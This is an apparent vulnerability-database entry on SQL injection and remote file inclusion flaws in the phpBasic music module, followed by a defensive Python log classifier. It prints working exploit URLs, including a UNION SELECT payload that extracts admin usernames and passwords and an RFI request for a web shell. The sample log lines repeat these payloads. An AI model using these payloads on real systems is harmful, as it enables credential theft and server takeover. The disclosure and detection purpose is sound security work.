PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar

Vulnerability ID 1052865 Vulnerability type
Published 2007-10-25 Updated 2007-10-25
CVE ID CVE-2007-5678
CVE-2007-5696
CNNVD-ID N/A
Platform N/A CVSS score N/A
|Source
https://cxsecurity.com/issue/WLB-2007100126
|Details
Vulnerability details have not yet been disclosed.
|Exploit
Software : phpBasic Music Module

Homepage : http://phpbasic.com/

1. SQL Injection by Xcross87 :

Proof of concept :

http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]

Xploit admin user account :

http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+

2. RFI by Alucar

Xploit :

http://victim.com/phpbasic/includes.php?root=[HCE_Shell]

=== ..::Xcross87::.. | ..::Alucar::.. | HCETeam Xploiter | HCEGroup.Vn ===
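
For defenders reviewing web-server logs, the two request shapes listed above can be flagged with a small classifier. This is an added example, not part of the original advisory or of phpBasic; the access-log format, the sample lines, the label strings and the function name `classify` are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IPs and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Oct/2007:10:00:00 +0000] "GET /phpbasic/?php=music&basic=view&id=12 HTTP/1.1" 200 512',
    '192.0.2.11 - - [25/Oct/2007:10:00:05 +0000] "GET /phpbasic/?php=music&basic=view'
    '&id=1+union+select+0,1,user_name,3,user_pass,5,6,7,8,9+from+php_user/* HTTP/1.1" 200 900',
    '192.0.2.12 - - [25/Oct/2007:10:00:09 +0000] "GET /phpbasic/includes.php'
    '?root=http://example.invalid/x.txt%3F HTTP/1.1" 200 40',
    '192.0.2.13 - - [25/Oct/2007:10:00:12 +0000] "GET /phpbasic/?php=music&basic=view&id=%27 HTTP/1.1" 500 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a remote URL scheme has no business in a path parameter.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def classify(line):
    """Return labels for one log line: 'sqli-id' and/or 'rfi-root', or []."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    # parse_qs percent-decodes values and turns '+' into a space.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []

    # Issue 1: the music module's view action takes id; anything that is
    # not a plain ASCII integer is suspect.
    if params.get("php") == ["music"] and params.get("basic") == ["view"]:
        if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("id", [])):
            findings.append("sqli-id")

    # Issue 2: includes.php receives root; a remote URL here matches the
    # remote file inclusion request shape.
    if url.path.endswith("/includes.php"):
        if any(REMOTE_URL_RE.search(v) for v in params.get("root", [])):
            findings.append("rfi-root")
    return findings


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        labels = classify(entry)
        if labels:
            print(entry.split()[0], labels)
```
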